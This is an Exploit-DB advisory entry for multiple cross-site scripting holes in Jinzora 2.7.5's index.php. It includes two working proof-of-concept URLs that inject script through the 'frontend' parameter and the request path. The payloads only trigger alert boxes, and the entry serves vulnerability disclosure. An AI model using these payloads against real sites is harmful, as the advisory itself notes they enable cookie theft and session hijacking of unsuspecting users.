Jinzora 2.7.5 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities

EDB-ID:

31235




Platform:

PHP

Date:

2008-02-19


source: https://www.securityfocus.com/bid/27876/info

Jinzora is prone to multiple HTML-injection and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, and launch other attacks.

Jinzora 2.7.5 is vulnerable; other versions may also be affected. 

http://www.example.com/[installdir]/index.php?frontend=<IMG SRC="javascript:alert(&#039;DSecRG XSS&#039;)">
http://www.example.com/[installdir]/index.php/"><script>alert(&#039;DSecRG XSS&#039;)</script>